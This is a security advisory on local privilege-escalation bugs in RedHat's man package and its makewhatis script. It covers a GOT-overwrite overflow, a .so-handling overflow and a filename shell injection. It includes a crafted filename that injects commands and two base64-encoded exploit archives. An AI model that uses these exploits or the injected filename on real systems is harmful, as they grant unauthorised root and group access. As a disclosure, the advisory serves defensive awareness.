COMMAND
man
SYSTEMS AFFECTED
man 1.5h10 + man 1.5i-4 (RedHat 7.0, 7.1)
PROBLEM
zen-parse found following. This advisory is also stored, along
with the exploits at http://generic.labs.pulltheplug.com/zen/ as
man.txt. This is a bug in the man package, not the man-db package.
Multiple versions of man are affected. The version numbers given
are RedHat rpm version numbers. Just because a version is not
listed here, it does not mean it is not vulnerable. The main
problem, which allows root is in the /usr/sbin/makewhatis file.
If there is no checking for shell metacharacters in files being
used as arguments, it is possible there is a problem.
man-1.5h1
=========
man -S `perl -e 'print ":" x 100'` ls
will cause a Segmentation fault error, due to incorrect bounds
checking in the array used to hold the section list. Stored after
the tmp_section_list structure are the heads of a couple of linked
lists, cat_list and man_list, which holds the names of the files
already shown.
By using a pointer to strcpy() (the last entry in the GOT) as the
'next' pointer, it is possible to overwrite the address of the
library function 'strcpy' with a newly malloc()ed string
containing the name of the file just viewed. The string will
then be executed instead of strcpy.
(strcpy() is used, because it contains a NULL after it in the GOT,
which looks to man to mean "This is the tail of the linked list",
and because it gets called at the appropriate time.)
Exploiting this gives you gid man. (Elevation of gid man -> root
dealt with after the next section).
man-1.5i-4
==========
This version does not have the -S problem. It does how ever have
an overflow in the handling of .so (sourced) man pages. If a
manpage has
.so something
as the first line, ultimate_source() attempts to find the file
refered to by the something.
If it is compressed, it uses my_popen(), a wrapped version of
popen() that drops privs to the users, to read the contents, and
check that file for a .so line as well. Under certain
circumstances the filename will increase in length.
As there is no checking for the existance of the file other than
the return value from the popen() call, it is possible, by
embedding shell metacharacters in the filename to be opened to
trick it into thinking it succeeded.
The same commands that fool it into thinking it succeeded can
return the next file to look at name. This can be done several
times, until the overflow has reached the desired point. (ultname
is 8192 bytes long, but due to the layout of the variables in
memory, it needs an overflow of more than double that in order to
affect yhe list structure used in the previous exploit, which is
what zen's exploit does.)
Successful exploitation will result in gid man.
/usr/sbin/makewhatis
====================
...
function readline() {
if (use_zcat) {
result = (pipe_cmd | getline);
if (result < 0) {
print "Pipe error: " pipe_cmd " " ERRNO > "/dev/stderr";
}
...
if (use_zcat) {
pipe_cmd = "zcat " filename;
...
Imagine a file called:
"ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;gimmeroot;echo .1.gz"
Mimed exploits:
---
Content-Type: application/octet-stream; name="man-15first.gz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="man-15first.gz"
Content-MD5: 98NPzNGrT4P4i5ziGbtb9g==
H4sIAByb/joAA+1X62/bRgzPZ/0VrIo2sitLJz/ibI4LFEO2DtvQoQ2wD0kwyKeTpVkP406y
nQ7530eeJMd2Hv2SPYqJgKUTyeP9juQd6dTPejLPi57YLJM8Ltyj5yfGhmw8GuFb0+G7Go/7
4/HIGw29/hHzBsxjRzD6G7Dco1IVvgQ4Iic8pfcl+VdK6WH8kZEJqRz+fGtgMNnJcPhY/PsD
1j+I//DE846APR+Ex+l/Hn/XBYw4eM4o8qAH8zgAbwQW8joQyjwFt1TSncUZJYaB2j34LLLe
0pdKwMj1Bm6fMc8wgEfoRhWJJOF5IC6vYWqYV5vZN1ebEbvaDId3v1PvaiOQP/T2+bNTlJ3u
8kwy0Q8eUJ09YnZ2X5fj/FOmTZHYC3GqQBYiGJ9cbRiuOMApnNWrE29cyfWY43IoYzNtgtjh
AN+ESlTTaTyqVavVKpPBrNIPyCwjWWUChwJZAaqHYfPTPlaROTGM1I8zK84K8OWc29qx3S6O
Vx3jz9rRszK8xFPFric1o9sV2Wr7UaRLHJOJZAJQjbIps/+YMkTMRt5wwFHgujMR5lJAEQmY
JX62AD8IpFAK8hBUIfnyxurgbPjhw0VlJUUrS7QyCzWxCRo568EyR6GQUOTaVuangkzQWGwE
Lwt/lgjMEgQ5tQhjt9tJ/STJuTXoDjsTLblk17VwK8MtkrCGUunY5q/vLt5PXdykazZSv2ik
2xy8LzIxh4sozuaUzGazqvfYqrhAI5mLAlUt8+L84y/VmkuJOw6tyoCtBdNXyrRxUmO4fz1l
+2YOt1UbQQ3EtghiGcXoxONXigB6x6b9ukJ+ObrW+jeqEKlVL7E3W/Aoh+P34oZ8LsXx260V
d5OGjrdx5p+ftoeHe9VDAiWKcgk8T3F2kMQZxa0OAKadbXraAZg3ljdJzjwPn2/edAzA3Gz8
rfW+1Xq7rNfLe5w/iHNr6CxJhGXuXjemDhg+e5wen0xb292kXdNmNu4E594a//YN+nXTQ/W/
T4xnbAC+VP+HJ+PD+j/uD9r6/0/QQf0vsf4zsGizdf3f6whWsQ/UBLii4C6XeeYEfpzcYNIs
xDryixj7RuQCXhxV46Cqo9xIn2ggXsYZT8pAwFmZxaoInOjtDg8ZcU4s42UgQryT4OLDdx/P
312cg6nBrMoE21aqMr0i38voHoLu0T2Ciy/iIIiFcl0cP2BII8aLWtApqC7PRDkeXp0THoDj
PPykYotr5bIAXZicCVYLQjDRl7KeT4vXZBhUR3m+rmqC0kWdWMs4oKIdWkpxP8OXbb7qKtj7
BXiFo17nxdSrb9y6CJif8lTo2gaxAsWlWN/AOi4icJcy526S+4G/mjtXVd3D+zYurEF9+Uq8
8WVWAbg1jKqHSONkgc5YCKsGZ+/gbWoPYnRXvnS5z6PKa1WgCSjhnGyNK21atzbawvc//nwO
XcIWNm0LfShsa/rDbVsjVnGCJWix5WrflZLgJL4qGp+B5XOOfYt1CMe0f/v9w0+dA2eVkAkR
wFrGhYBqJrUud3PpUDhQyBvY/h9qPNfYQH2Msz4fqGNT3c1AlhkOMAK4l7n0U/DnuON9r3u1
1zHSLyztgGmYL0WG2HdDhSVPmp1OB/ahkyZFeU8XQjyGInDuYSQo9TmAdZ4d01MudGLkZQFx
sQ+tX0MLcWdKY1M2ed7WMHXZ50muhLX9roMwpXzW+sRcR4imiUhzvuyPe4F4etuE6HEQ91Do
bqRKi10kNbizaSVqvnW3omFgB5RSet2BvMv6WtluUrCjF7ol/7RNR0sttdRSSy211FJLLbXU
UksttdRSSy211FJL/3H6CxcC6PYAKAAA
-----
---
Content-Type: application/octet-stream; name="man-15second.gz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="man-15second.gz"
Content-MD5: 9DkClpUM1IMmIRl5XuBLOw==
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
/vovHX93427cjbtxN36Z8V+HkzhxACgAAA==
-----
SOLUTION
For more info:
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=19351
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=40400
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=41805
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=42450
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=43213